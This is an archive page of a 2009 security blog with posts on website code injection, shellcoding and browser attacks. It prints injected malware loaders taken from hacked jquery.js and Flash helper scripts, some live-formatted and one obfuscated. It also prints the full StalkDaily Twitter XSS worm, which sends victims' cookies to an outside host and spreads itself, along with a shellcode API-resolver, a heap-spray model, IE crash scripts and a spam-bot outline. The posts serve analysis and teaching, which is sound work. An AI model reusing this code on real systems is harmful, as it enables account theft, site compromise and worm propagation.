Archive for October, 2009

When Benign scripts attack!

October 28th, 2009

Code injection attacks are constantly morphing. Attackers keep looking for ways to deposit malicious code into websites in order to infect the sites' visitors. Once infected, visitors' machines can become part of very large botnets and are used to push the code-injection cycle further. The injection itself is usually done with the site owner's FTP user name and password, sniffed from the clear-text FTP sessions most people still use to update their websites.

Traditionally, attackers have relied on obfuscated code, packed scripts and all sorts of techniques that would flummox the average site owner. Now there is an increasing concentration on modifying scripts that already exist on websites, so the malicious code hides inside a file the owner expects to be there.

Most websites use scripts such as jquery.js and AC_RunActiveContent.js, which makes them prime candidates for tampering.

What do these “benign” scripts do?

jQuery (jquery.com) is a fast and concise JavaScript library that simplifies HTML document traversal, event handling, animation and Ajax interactions for rapid web development.

It wraps the core browser facilities (e.g. animation, Ajax, form validation) in straightforward interfaces that the rest of the page's code can call, giving a scripting layout that is faster, simpler and easier to use.

When content developers publish a Flash document for HTML using the “Flash Only” or “Flash HTTPS” HTML templates, a JavaScript file linked from the HTML file, named AC_RunActiveContent.js, is created automatically. This file has to stay alongside the HTML file, because it is what embeds the active content from JavaScript. Its function AC_FL_RunContent() dynamically generates the object and embed tags the browser needs to display the Flash movie; the function is defined in AC_RunActiveContent.js and called at the spot in the HTML where the movie should appear.

The Hacks

Attackers have now started to focus on these scripts, appending code like the samples below. (The listings are defanged: tag names and URLs are broken up with spaces and “hxxp” so that they neither load nor execute when viewed here.)

Website owners and content creators should be aware of this evolving threat and be ready to deal with it. One simple defence is to record SHA-1 and MD5 hashes of the clean copies of these benign scripts and compare them frequently against what is live on the server; a hash that changes when you did not publish anything is a compromise, and the diff will usually show a loader appended after the library's real code. Consider this badwarebusters.com post: even a few minutes ago, cases of similar hacks were still popping up. There too a benign script was compromised with nearly the same code as the one used in the jQuery hack.

Adios all, till the next in this vein of posts. And as usual, StopTheHacker is always here to help.

Consider an example of AC_RunActiveContent.js being hacked (the tail of the file, with the injected loader on the last line):

  method.onMouseRight = function(event) {
    this.bubbleUp(event);
  }

NOF.Flash.__proto__.ComponentsMouseListener = NOF_Flash_ComponentsMouseListener;
}

document.write('<script src=http://spielwaren-carl-loebner.de/shop/team.php ><\/script>');

Now jQuery: consider code like the below, right on top of the main source. The percent-encoded blob is decoded at run time into a loader; it is truncated here.

$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14Z2529);Z2522;Z22;ceZ3dZ223hZ2561Z2572CodZ2565At
(Z2530)^(Z25270Z2578Z25300Z2527+esZ2529));Z257d}Z22;cdZ3dZ22Z253dst+Z2553triZ256egZ252efZ2572Z256fmZ254
3haZ2572CZ256fdeZ2528(Z2574mp.Z256Z22;czZ3dZ22Z2566uZ256ectZ2569onZ2520cZ257a(czZ2529Z257bretZ2575rZ256eZ
2520ca+Z2563Z2562+cZ2563Z252bcZ2564+ceZ252bczZ253bZ257d;Z22;cbZ3dZ22pZ2565(Z2564s)Z253bstZ253dtmpZ253dZ25
27Z2527;for(iZ253d0;iZ253cds.Z256cenZ22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dZ2573Z2574;Z2564cZ2573Z2528dZ2
561Z252bdZ2562+Z2564cZ252bZ2564dZ252bdZ2565,Z2531Z2530)Z253bZ2564Z2577Z2528Z2573tZ2529;Z2573Z2574Z253dZ25
24Z2561;Z2522;Z22;dzZ3dZ22Z2566unZ2563tioZ256e dZ2577(tZ2529Z257bcaZ253dZ2527Z252564oZ252563umeZ25256etZ2
52ewZ252572Z252569Z252574Z2565Z252528Z252522Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253cscrZ
252

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=funct

Add to this the existence of tons of other scripts, live clocks and the many widgets people pull from Dynamic Drive and similar sites, and the scale of this relatively “silent” attack vector is very large.

And this time, right after the body of the main code:

var ret = handler.apply(this, arguments);

if( ret !== undefined ) {
	event.result = ret;
	if ( ret === false ) {
		event.preventDefault();

document.write('<sc ript src=hxxp://stroysauna.ru/da37d9e b94067800b6205421a826ccd0/links.php ><\/sc ript>');
document.write('<s cript src=hxxp://stroysauna.ru/da37d9eb94067800b6205421a826ccd0/lin ks.php ><\/script>');
document.write('<scr ipt src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write('<sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write('<sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write('<scri pt src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
document.write('<scri pt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scri pt>');
document.write('<scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\ / sc ript>');
document.write('<sc ript src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scri pt>');
document.write('<scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scr ipt>');

Here’s a really recent example:

The malicious code looks like the listing below and is inserted at the end of the benign AC_RunActiveContent.js script:

default:
 ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
 }
 }
 ret.objAttrs["classid"] = classid;
 if (mimeType) ret.embedAttrs["type"] = mimeType;
 return ret;
}

document.write('<sc ript src=hxxp://tet asperu.pe/wordpress/video11.php ><\/script>');
document.write('<scr ipt src=hxxp://sam poong.co.kr/admin/SMALL_UPDIR/index.php ><\/script>');
document.write('<scri pt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
document.write('<sc rip t src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
document.write('<scr ipt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');

And if you haven’t had a fill of it yet… here’s more:

this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||
document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],
document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],
document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):
this.css(J,typeof K==="string"?K:K+"px")}})})();

document.write('<s c ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://l ou-ferrign o.info/.smileys/sinbad.php ><\/script>');
document.write('<scr ipt src=http://lo u-ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<script src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<sc ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scrip t src=http://lou-f errigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
document.write('<scr ipt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
document.write('<sc ript src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
document.write('<s cript src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
document.write('<scri pt src=http://lou-ferrign o.info/.smileys/sinbad.php ><\/script>');
document.write('<scr ipt src=http://f ici.com/promotional-wall-calendars/cal1.php ><\/script>');
document.write('<sc ript src=http://sc hitkomplekt.ru/price/index.php ><\/script>');
document.write('<s cript src=http://fic i.com/promotional-wall-calendars/cal1.php ><\/script>');
document.write('<scrip t src=http://fici .com/promotional-wall-calendars/cal1.php ><\/script>');
document.write('<scri pt src=http://kalai kaviri-offcamp.com/images/gifimg.php ><\/script>');
document.write('<scr ipt src=http://kolons port.com.cn/images/b54/gifimgz.php ><\/script>');
document.write('<script src=http://brandper fumes.co.uk/tips_on_how_to_wear_your_perfume_correctly/require.php ><\/script>');
document.write('<scri pt src=http://salgoo.c om/data/_tail.php ><\/script>');
document.write('<scr ipt src=http://thecelebr itynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');
document.write('<sc ript src=http://thecelebri tynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');

Security

Windows (Win32) Shell coding pointers – I

October 24th, 2009

Although a bit dated, these pointers on shellcoding provide a decent starting point for enthusiasts who want to poke around with binaries :-). Most of the information is collected from various texts on nologin.org (read win32-shellcode.pdf and many more) over the last few years and from experience with binaries. The pointers are definitely good for Windows 9x/2k/NT; some also apply to XP.

Here we go!

NT-based versions of Windows expose a system call interface through int 0x2e. Newer versions, such as Windows XP, can use the optimized sysenter instruction instead. Both mechanisms accomplish the same goal: transitioning from ring 3 (user mode) to ring 0 (kernel mode).

Windows, like Linux, stores the system call number, or command, in the eax register.

The system call number in both operating systems is simply an index into an array that stores a function pointer to transition to once the system call interrupt is received.

System call numbers are prone to change between versions of Windows, whereas Linux system call numbers are set in stone. This difference is the source of the trouble with writing reliable shellcode for Windows, and it is why invoking system calls directly from Windows shellcode is generally considered bad practice.

Unlike Linux, Windows does not export a socket API via the system call interface. This immediately rules out network-based shellcode via that mechanism; sockets have to be reached through the user-mode DLLs.

In Windows, like Unix variants, standard user-mode API’s are exported in the form of dynamically loadable objects that are mapped into process space during run time. The common names for these types of object files are Shared Object (.so) or, in the case of Windows, Dynamically Linked Library (.dll).

Users can change the address at which kernel32.dll loads by using the rebase.exe tool, so even a hard-coded address for one Windows version is not reliable.

The process of determining the kernel32.dll base address involves making use of the Process Environment Block (PEB).

The operating system allocates a structure for every running process that can always be found at fs:[0x30] from within the process.

The PEB structure holds information about the process' heaps and binary image and, most importantly, three linked lists of the modules that have been mapped into process space. The lists differ in purpose: one gives the order in which the modules were loaded, another the order in which they were initialized. The initialization-order list is the interesting one, because kernel32.dll is always the second module to be initialized. By walking that list to the second entry, one can deterministically extract the base address of kernel32.dll. (One caveat: this holds for NT 4/2000/XP/2003, where the list starts ntdll.dll, kernel32.dll; from Windows 7 on, KernelBase.dll sits between them, so the “second entry” shortcut no longer lands on kernel32.dll and later shellcode hashes module names instead.)

DLL Portable Executable images have an export directory table. It holds the number of exported symbols and the Relative Virtual Addresses (RVAs) of three arrays: the functions array, the symbol names array and the ordinals array. The names and ordinals arrays are parallel (entry i of each describes the same symbol), and the ordinal at entry i is the index into the functions array that holds that symbol's RVA.

To resolve a symbol, walk the names array, hashing each name, until the hash matches the hash of the symbol requested; the matching index leads through the ordinals array to the function's RVA, which is added to the module base to get its virtual address.

A name can be reduced to a four-byte hash, which keeps the shellcode small and free of string literals.

Sometimes one can use a DLL's Import Address Table (IAT) to resolve function VMAs in a reliable fashion (Metasploit samples do this).
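As an added example (not from the original post or from the nologin paper it cites), here is the four-byte hash and the export-table walk from the pointers above, written out in JavaScript so it can be run anywhere. The hash is the ROR-13 name hash used by the classic Win32 shellcode in that paper: rotate the running value right by 13 bits and add the next byte. The export directory, the module base 0x7c800000 and the RVAs are constructed stand-ins; real shellcode gets the base from the PEB walk and reads the three arrays out of the mapped DLL.

```javascript
// Added example, not the post's or nologin's code. ROR-13 symbol hash plus a walk
// over a constructed stand-in for a DLL export directory.

// hash = ror32(hash, 13) + byte, for each byte of the name. Well-known result:
// ror13Hash("LoadLibraryA") === 0xEC0E4E8E, the constant seen in many shellcodes.
function ror13Hash(name) {
  let h = 0;
  for (let i = 0; i < name.length; i++) {
    h = ((h >>> 13) | (h << 19)) >>> 0;   // rotate right by 13 in 32 bits
    h = (h + name.charCodeAt(i)) >>> 0;   // add the byte, keep 32 bits
  }
  return h;
}

// The export directory's three arrays (contents constructed for the example):
//   names[i]     -> exported symbol name
//   ordinals[i]  -> index into functions[] for that name
//   functions[j] -> RVA of the code
const FAKE_KERNEL32_EXPORTS = {
  names: ["ExitProcess", "GetProcAddress", "LoadLibraryA", "WinExec"],
  ordinals: [2, 0, 3, 1],
  functions: [0x0000a000, 0x0000b000, 0x0000c000, 0x0000d000],
};

// Resolve a symbol the way the shellcode does: hash each name until one matches,
// then name index -> ordinal -> RVA -> VMA (base + RVA). null if not exported.
function resolveByHash(moduleBase, exportsDir, wantedHash) {
  for (let i = 0; i < exportsDir.names.length; i++) {
    if (ror13Hash(exportsDir.names[i]) === wantedHash) {
      const rva = exportsDir.functions[exportsDir.ordinals[i]];
      return (moduleBase + rva) >>> 0;
    }
  }
  return null;
}

// The hashes an exploit would precompute and push as immediates.
function hashTable(names) {
  const table = {};
  for (const n of names) table[n] = ror13Hash(n);
  return table;
}

// Example run against the constructed table, with a made-up kernel32 base.
const KERNEL32_BASE = 0x7c800000; // constructed; comes from the PEB walk in practice
const wanted = hashTable(["LoadLibraryA", "GetProcAddress", "ExitProcess"]);
for (const [fn, h] of Object.entries(wanted)) {
  const vma = resolveByHash(KERNEL32_BASE, FAKE_KERNEL32_EXPORTS, h);
  console.log(fn, "hash 0x" + h.toString(16), "->", vma === null ? "missing" : "0x" + vma.toString(16));
}
```

Two things the walk makes visible: the ordinals array is what maps a name to its function slot (the name index alone is not an index into the functions array), and because only the 32-bit hash is compared, a collision with an unrelated export would silently resolve the wrong function, which is why shellcode authors check their hashes against the whole export list of the target DLL.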

Connectback shell code, or reverse shell as it is also called, is the process by which a TCP connection is established to a remote host and a command interpreter’s output and input are directed to and from the allocated TCP connection.

Happy coding!

Security

Whats up with twitter?

October 21st, 2009

Twitter is over capacity. In that vein, here is a post from gist.github.com showing the source code of the StalkDaily Twitter XSS worm. It is a good example of combining CSRF/XSRF with XSS: because the script runs inside twitter.com's own origin, it can read the victim's screen name and the page's anti-CSRF token (twttr.form_authenticity_token) straight out of the HTML, then post a status update and rewrite the profile URL with that token attached, which re-infects everyone who views the profile. A CSRF token only protects against requests forged from another origin; once an attacker has script execution on the site itself, it is no defence at all.

function XHConn()
{
  var xmlhttp, bComplete = false;

  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}

  if (!xmlhttp) return null;

  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;

    bComplete = false;
    sMethod = sMethod.toUpperCase();

    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }

      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }

    catch(z) { return false; }

    return true;
  };

  return this;
}

function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();

    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };

    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    ret = encodeURIComponent(ret);

    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }

    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });

    return ret;
}

var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);

var username = userreg.exec(content);
username = username[1];

var cookie;
cookie = urlencode(document.cookie);

document.write("<img src='http://mikeyylolz. u uuq.com/x.ph p?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkd aily.com/log.gif'>");

function wait()
{
  var content = document.documentElement.innerHTML;
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);

  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];

  //alert(authtoken);

  var randomUpdate=new Array();
  randomUpdate[0]="Dude, www.Stalk Daily.com is awesome. What's the fuss?";
  randomUpdate[1]="Join www.StalkDa ily.com everyone!";
  randomUpdate[2]="Woooo, www.StalkDaily.com :) ";
  randomUpdate[3]="Virus!? What? www .StalkDaily.com is legit!";
  randomUpdate[4]="Wow...www.StalkDai ly.com";
  randomUpdate[5]="@twitter www.StalkD aily.com";

  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

  updateEncode = urlencode(genRand);

  var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mik eyylolz.uuuq.com/x.js"></script><a ');

  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");

  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}

setTimeout("wait()",3250);

News, Security

Beef with IE – II

October 19th, 2009

Building on my post, Beef with IE, here's another little look at what can crash the world's most popular browser. Running this script may crash your browser, so save your work. Again, I'm not sure whether to classify this as malware or something else.

<script type="text/javascript">
// As listed, c() is only defined; nothing happens until it is called.
function c() {
    var li = document.createElement("li");
    li.setAttribute("value", "1"); // setting the value attribute on an <li> ...
    li.value = "1";                // ... and then the value property is what trips IE
}
</script>

Tested with IE7 on Vista and IE6 on XP SP2 and SP3 (courtesy milw0rm).

Security

Twitter spamming: Some pointers

October 19th, 2009

Twitter has now become the undeniable darling of marketing enthusiasts, as this medium of communication has attracted millions of dedicated users. This has also led a lot of the bad guys to look at the medium as a place to spread their bile.

I am going to provide some links on which some “twitspam” tool-kits are built. I am not going to discuss how XSS/malware injection is used to spam users, but will look into developing a Twitter bot.

The basic concept is well established: bots, used on nearly every software communication channel known, from IRC to what not. A whole list of Twitter bots is available at twitter.pbworks.com; in fact you can even create your own bot at www.botomatic.com.

If you are a Pythonista, this might be of interest. It logs into your mail server, retrieves the notification e-mails Twitter sends for direct messages, and parses them so a bot can act on them.

from imaplib import IMAP4  # IMAP4 is clear text; use imaplib.IMAP4_SSL in practice
from email.parser import Parser
import email.utils
import re
import time

# Connect to the mail server that receives Twitter's notification e-mails
server = IMAP4("__EMAIL_SERVER.COM__")
server.login("__EMAIL_ACCOUNT_NAME__", "__EMAIL_PASSWORD__")
server.select("INBOX")

# Find only new mail (i.e. new direct messages)
r, data = server.search(None, "(NEW)")
message_ids = data[0].split()

# If there are new messages:
if message_ids:

    p = Parser()

    # Loop through new emails
    for num in message_ids:

        # Headers only: who the mail is from, plus Twitter's own X- headers
        r, data = server.fetch(num, '(BODY[HEADER.FIELDS (DATE SUBJECT FROM '
                                    'X-TwitterEmailType X-TwitterSenderScreenName '
                                    'X-TwitterCreatedAt X-TwitterRecipientScreenName)])')
        msg = p.parsestr(data[0][1].decode("utf-8", "replace"))
        who = msg['From']
        matchemail = re.compile(r'[\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4}')
        email_addy = matchemail.findall(who)[0]

        # Twitter username of the sender
        twitter_un = msg['X-TwitterSenderScreenName']

        # Only act on direct-message notifications sent by Twitter
        if msg['X-TwitterEmailType'] == 'direct_message':

            # When the direct message was sent, converted to epoch seconds
            twitter_time = msg['X-TwitterCreatedAt'].strip()
            time_tuple = email.utils.parsedate(twitter_time)
            epoch_seconds = time.mktime(time_tuple)

            # Body of the notification; the DM text is the first paragraph
            r, data = server.fetch(num, '(RFC822.TEXT)')
            body = data[0][1].decode("utf-8", "replace")
            twitter_dm = body.split("\r\n\r\n")[0].strip()

            # Do something with the twitter direct message...
            # Parse it...
            # Store it in a database?...

# Log out of the mail server
server.logout()

There's a five-minute version in PHP too. Note that both listings are 2009-era: Twitter's Basic-Auth statuses/update.xml endpoint and PHP's mysql_* functions have since been retired, so read them as the shape of a bot rather than as drop-in code.

<?php
    mysql_connect("localhost", "USERNAME", "PASSWORD") or die('Could not connect to database');
    mysql_select_db("DATABASE") or die('Could not select database');

    // Pick one canned tweet at random from the table
    $result = mysql_query("SELECT * FROM tweets ORDER BY RAND() LIMIT 1");

    while ($row = mysql_fetch_array($result)) {
        $tweet = $row['tweet'];
        sendTweet($tweet);
    }

    function sendTweet($msg) {
        $username = 'TWITTER-USER-NAME';
        $password = 'TWITTER-PASS';

        // Basic-Auth status update endpoint of the 2009 API
        $url = 'http://twitter.com/statuses/update.xml';

        $curl_handle = curl_init();

        curl_setopt($curl_handle, CURLOPT_URL, $url);
        curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
        curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl_handle, CURLOPT_POST, 1);
        curl_setopt($curl_handle, CURLOPT_POSTFIELDS, 'status=' . urlencode($msg));
        curl_setopt($curl_handle, CURLOPT_USERPWD, "$username:$password");

        $buffer = curl_exec($curl_handle);

        curl_close($curl_handle);

        if (empty($buffer)) {
            echo 'fail';
        } else {
            echo 'success';
        }
    }
?>

Security

Difference between Heap Spray and NOP Sled

October 19th, 2009

A lot of people I meet think that a NOP sled and heap spraying are the same thing. Not true at all. In short, a NOP sled is what you land on; a heap spray is how you make sure a guessed address lands on one. I wanted to write a description myself, but Wikipedia already has good ones.

Heap Spray

“In computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The term is also used to describe the part of the source code of an exploit that implements this technique. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’ heap and fill the bytes in these blocks with the right values. They commonly take advantage from the fact that these heap blocks will roughly be in the same location every time the heap spray is run. Heap sprays for web browsers are commonly implemented in JavaScript and spray the heap by creating large Unicode strings with the same character repeated many times by starting with a string of one character and concatenating it with itself over and over. This way, the length of the string can grow exponentially up to the maximum length allowed by the scripting engine. When the desired string length is reached a shell code is put at the end of the string. The heap spraying code makes copies of the long string with shell code and stores these in an array, up to the point where enough memory has been sprayed to cover the area that the exploit targets. Occasionally, VBScript is used in Internet Explorer to create strings by using the String function.”

NOP Sled

“In computer CPUs, a NOP slide, NOP sled or NOP ramp, is a sequence of NOP (no-operation) instructions (on Intel x86, this is the opcode 0x90) meant to “slide” the CPU’s instruction execution flow to its final, desired, destination. Generally a NOP slide will be used in cases where execution will branch into a position that cannot be determined with absolute accuracy, therefore “padding” the memory area before and after the approximate branch address is performed in the hope of avoiding an exception which would cause the program or system to crash. Once the CPU branches anywhere within the NOP slide, its IP (instruction pointer) will “slide” to its final destination, where there is valid code to be executed.”
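As an added example, not from the original post or from Wikipedia, the following JavaScript models the two techniques together and shows where they differ. It exploits nothing: the “shellcode” is an inert marker string, the heap layout is a constructed back-to-back arrangement of blocks, and the sizes are tiny so the code runs instantly. What it demonstrates is the string-doubling growth of the spray, the layout of each sprayed block (sled first, payload at the end), and why a guessed address anywhere inside the sprayed region lands on a sled that slides into the payload, whereas a single NOP sled only helps if the guess already falls inside that one buffer.

```javascript
// Added example: a model of heap spray + NOP sled, not exploit code and not from
// the original post. "\u9090" packs two 0x90 (x86 NOP) bytes into one UTF-16 unit.
const NOP_UNIT = "\u9090";

// Grow a one-unit string by repeated self-concatenation (the exponential growth
// the quoted text describes) and trim it to the requested length in UTF-16 units.
function growSled(units) {
  let s = NOP_UNIT;
  let rounds = 0;
  while (s.length < units) {
    s += s;
    rounds += 1;
  }
  return { sled: s.slice(0, units), rounds };
}

// One spray block: NOP sled first, payload at the very end of the block.
function buildSprayBlock(blockUnits, payload) {
  if (payload.length >= blockUnits) throw new Error("payload larger than block");
  return growSled(blockUnits - payload.length).sled + payload;
}

// Fill an array with copies of the block until `totalBytes` of heap is covered.
// (Real sprays use engine-specific tricks to force each copy to be a fresh
// allocation; here the array simply holds the references.)
function spray(totalBytes, blockUnits, payload) {
  const block = buildSprayBlock(blockUnits, payload);
  const copies = Math.ceil(totalBytes / (blockUnits * 2));
  const heap = [];
  for (let i = 0; i < copies; i++) heap.push(block);
  return heap;
}

// What execution would hit if it jumped to `addr`, assuming the blocks sit back to
// back from `regionBase` (constructed layout: real allocators add headers and
// alignment, which is why exploits pick an address deep inside the region).
function landing(addr, regionBase, blockUnits, payloadUnits) {
  if (addr < regionBase) return { region: "outside", offsetInBlock: -1, bytesToPayload: -1, entryOk: false };
  const blockBytes = blockUnits * 2;
  const payloadStart = (blockUnits - payloadUnits) * 2;
  const off = (addr - regionBase) % blockBytes;
  if (off < payloadStart) {
    // every byte of the sled is a 1-byte NOP, so any offset here slides to the payload
    return { region: "sled", offsetInBlock: off, bytesToPayload: payloadStart - off, entryOk: true };
  }
  // inside the payload: only its first byte is a valid entry point
  return { region: "payload", offsetInBlock: off, bytesToPayload: 0, entryOk: off === payloadStart };
}

// Fraction of the sprayed region that is sled, i.e. the chance that a uniformly
// guessed address inside the region is a safe landing spot.
function sledFraction(blockUnits, payloadUnits) {
  return (blockUnits - payloadUnits) / blockUnits;
}

// Example run with toy sizes: 16-unit blocks, a 2-unit marker "payload".
const REGION_BASE = 0x0c000000; // constructed region start
const heap = spray(4096, 16, "XY");
console.log("blocks sprayed:", heap.length, "sled fraction:", sledFraction(16, 2));
console.log("guess +38 bytes:", landing(REGION_BASE + 38, REGION_BASE, 16, 2));
console.log("guess +30 bytes:", landing(REGION_BASE + 30, REGION_BASE, 16, 2));
```

Reading the two `landing` results side by side is the whole point: the first guess lands in a sled and slides 22 bytes into the payload; the second lands two bytes into the payload itself and would execute from the middle of it. Making the sled as large as possible relative to the payload (a high `sledFraction`) is what turns an imprecise address guess into a reliable exploit, and the spray is what guarantees that the guessed address is inside some block at all.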

Hope this helps.

Security

Beef with IE

October 18th, 2009

I've never been a fan of IE, and one particular incident pretty decisively confirms the decision I made long ago to switch to other browsers. I spend time tinkering with both JavaScript and browsers, and some time back I came across a script that iterates through the properties of a DOM object on a page. It did this using document.write, the method used to output text to the document. I remember the outcome well: Firefox chugs along fine, but IE throws an unhandled exception and goes bonkers. The script in question is one line long, 61 bytes, and can be embedded in any web page. Running it may crash your browser, so save your work. I don't know whether to classify this as malware or something else.

<script>
for (x in document.write) {
    document.write(x);
}
</script>

Security

Opera Unite: Boon or Bane

October 16th, 2009

Here's an interesting piece of news: Opera 10, the shiny new version of one of the finest browsers available today, has been released. It's slick and has tons of eye candy. One really interesting part of the new version is Opera Unite: basically a high-level plug-in framework that lets you add further plug-ins/modules/functionality to the browser so you can share files, pictures and music. The most interesting part is that it lets your browser act as a web server.

And here it comes, from my experience of how the bad guys work, limited as it may be compared to the stalwarts of the industry: I think this is an immensely attractive attack vector for the malware industry.

Consider that browsers almost always have flaws. Websites almost always suffer from XSS flaws, which allow code injection, browser hijacking, session stealing, cookie manipulation and what not. Combine this with the fact that a lot of people still open e-mail attachments carelessly and will click on phishing links. And if you are still reading, let me throw in the fact that AVs are not 100% accurate by any standard... not even close.

My prediction: there is an attack coming that will exploit the Opera Unite functionality. It will be loosely based on XSS, will inject malware pages directly onto a user's computer, and those pages will then be served up by the Opera Unite web server.

Another interesting twist: Opera now lets what you share from your computer be listed in search engine results. So, if you want to infect a large number of machines, propagating malware via search results could be a good way to go. For those thinking that Google's Safe Browsing will profile the bad entries, I have two words: polymorphism and scale.

Google does have the capability to add 6000+ bad sites to its malware list every day, and is probably testing 50-60 times that number anyway, but profiling a whole mal-net running on Opera browsers would be something else.

Of course the Opera team, which is excellent, will do its bit to protect its users, and hence the window for exploitation would be short. However, problems (functionality/XSS) still remain, which can be exploited; see below.

My Opera: potential XSS vulnerability (screenshots in the original post).

Security

Common Iframe injection target sites: Russia

October 7th, 2009

For the last few weeks we have been receiving reports from affected parties who have been hit with a spate of iframe injection attacks. If you see any of these sites embedded as an iframe or as an HTTP link on your site, consider removing them; a grep of the web root for these hostnames is a quick way to check.

DO NOT VISIT THESE SITES AS THEY MIGHT HOST LIVE MALWARE

Russia

3cw.ru
3f0.ru
3f2.ru
a3l.ru
a5j.ru
aj4.ru
b5r.ru
b8e.ru
c1z.ru
c3q.ru
c5e.ru
c6y.ru
f5l.ru
f6y.ru
f7g.ru
last-life.ru
playbetwager.cn
q0a.ru
q0v.ru
q3c.ru
q3s.ru
q3t.ru
q59.ru
u0b.ru
u0r.ru
u1a.ru
u1m.ru
u5c.ru
u5k.ru
u5l.ru
u6b.ru
u6c.ru
u7x.ru
u9k.ru
x0c.ru
x0q.ru
x1i.ru
x7o.ru
x8e.ru
x9f.ru
xb4.ru
xc8.ru
xe5.ru
xe6.ru
xq0.ru
xt7.ru

Security

Common Iframe injection target sites: China

October 6th, 2009

For the last few weeks we have been receiving reports from affected parties who have been hit with a spate of iframe injection attacks. If you see any of these sites embedded as an iframe or as an HTTP link on your site, consider removing them; a grep of the web root for these hostnames is a quick way to check.

DO NOT VISIT THESE SITES AS THEY MIGHT HOST LIVE MALWARE

China

bigtopsuper.cn
liteautoexcellent.cn
mediahomenamemartvideo.cn
literideinsurance.cn
liteautogreatestonline.cn
findbigwords.cn
hotslotpot.cn
superlitecarbest.cn
superlottry.cn
findyourbigwhy.cn
litegreatestdirect.cn
playbetwager.cn
greatliteautobest.cn
mediahousenameshopfilm.cn
liteautotoponline.cn
mixante.cn
namebuyfilmlife.cn
homenameworld.cn
namebuypicture.cn
mainnameshop.cn
lotultimatebet.cn
blockcenterplay.cn
findbigbrother.cn
namemartfilmlife.cn
findbigname.cn
dotcomnameshop.cn
homenameregistration.cn
